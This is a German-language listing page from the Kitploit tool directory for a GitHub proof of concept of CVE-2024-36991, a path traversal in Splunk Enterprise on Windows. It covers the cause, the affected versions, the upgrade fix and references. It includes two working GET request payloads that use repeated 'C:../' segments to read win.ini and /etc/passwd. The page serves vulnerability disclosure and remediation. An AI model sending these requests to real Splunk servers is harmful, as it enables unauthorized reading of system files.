Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-36991 — Pfad-Traversal am Endpunkt "/Modules/Messaging/" in Splunk Enterprise auf Windows | Kitploit
Tools/GitHubGitHub/mr-xn/cve-2024-36991
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubmr-xn/cve-2024-36991

CVE-2024-36991

Pfad-Traversal am Endpunkt "/Modules/Messaging/" in Splunk Enterprise auf Windows

Repository anzeigen
912vor 2 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-36991

Path Traversal auf dem Endpunkt "/Modules/Messaging/" in Splunk Enterprise unter Windows

In Splunk Enterprise-Versionen unter 9.2.2, 9.1.5 und 9.0.10 könnte ein Angreifer einen Path Traversal am Endpunkt /modules/messaging/ in Splunk Enterprise unter Windows durchführen.

Die Schwachstelle besteht, weil die Python-Funktion os.path.join den Laufwerksbuchstaben aus Pfadtokens entfernt, wenn das Laufwerk im Token mit dem Laufwerk im erstellten Pfad übereinstimmt.

Diese Schwachstelle sollte nur Splunk Enterprise unter Windows betreffen.

POC

root@kitploit:~
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd

Affected

betroffen von 9.2 bis vor 9.2.2

betroffen von 9.1 bis vor 9.1.5

betroffen von 9.0 bis vor 9.0.10

Solution

Aktualisieren Sie Splunk Enterprise auf die Versionen 9.2.2, 9.1.5 und 9.0.10 oder höher.

Credits

Danylo Dmytriiev (DDV_UA)

References

  • https://advisory.splunk.com/advisories/SVD-2024-0711
  • https://www.cve.org/CVERecord?id=CVE-2024-36991
Tool herunterladen